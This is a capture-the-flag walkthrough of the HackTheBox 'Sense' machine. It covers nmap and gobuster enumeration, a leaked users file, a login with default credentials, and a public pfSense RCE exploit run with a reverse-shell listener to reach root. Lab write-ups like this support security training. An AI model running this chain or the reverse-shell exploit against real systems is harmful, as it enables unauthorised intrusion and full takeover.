HackTheBox: Sense — Walkthrough
Sense! An easy rated machine which can be both simple and hard at the same time. Enumeration is a heavy factor in this box, so make sure you don’t overlook anything! Missing one simple detail might result into countless hours of wasteful searching and mashing of the keyboard :). Without further ado, let’s get right into it!
Let’s get started with Nmap:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-29 16:58 EDT
Nmap scan report for 10.10.10.60
Host is up (0.35s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open ssl/http lighttpd 1.4.35
|_http-title: Login
|_http-server-header: lighttpd/1.4.35
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.99 secondsThe scan yields 2 open ports (HTTP on port 80, HTTPS on 443)
This shows us that there is an login panel , Firstly I have tried all authentication bypass vulnerabilities but no luck so I started fuzzing the directories.
gobuster -u https://10.10.10.60/-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e
Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : https://10.10.10.60/[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
[+] Expanded : true
=====================================================
https://10.10.10.60/themes(Status: 301)
https://10.10.10.60/css(Status: 301)
https://10.10.10.60/includes(Status: 301)
https://10.10.10.60/javascript(Status: 301)
https://10.10.10.60/classes(Status: 301)
...[MORE OUTPUT REDACTED]...Took some time to inspect all of the directories to no avail. They are either 404 or redirect back to the login page. In my second attempt I do gobuster once again. However, this time I use -x option to look for specific file extensions as well. Extensions such as .php, .txt, .sh, .bak are always good choices. Lazy sysadmins often leave files laying around. What a shame, right?
gobuster -u https://10.10.10.60/-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e-xtxt
Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : https://10.10.10.60/[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions : .txt
[+] Expanded : true
=====================================================
https://10.10.10.60/themes(Status: 301)
...
...
https://10.10.10.60/changelog.txt(Status: 200)
...
https://10.10.10.60/system-users.txt(Status: 200)
...
...As you can see now, we get 2 new options — changelog.txt and system-users.txt. Let’s check them out.
So the user is rohit and the default password for the company is pfsense let’s see it works.
Bingo, We are in. The page showing us the version number so, I tried to search the exploit online I found one RCE.
https://www.exploit-db.com/exploits/43560
Download this exploit and run it.
searchsploit -m php/webapps/43560.pyNow run the exploit. And make sure your listener is running.
python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.9 --lport 1337 --username rohit --password pfsense
Boom We are in as root, There is no need for the privilege escalation. You can find flags from /home/rohit/user.txt and /root/root.txt.
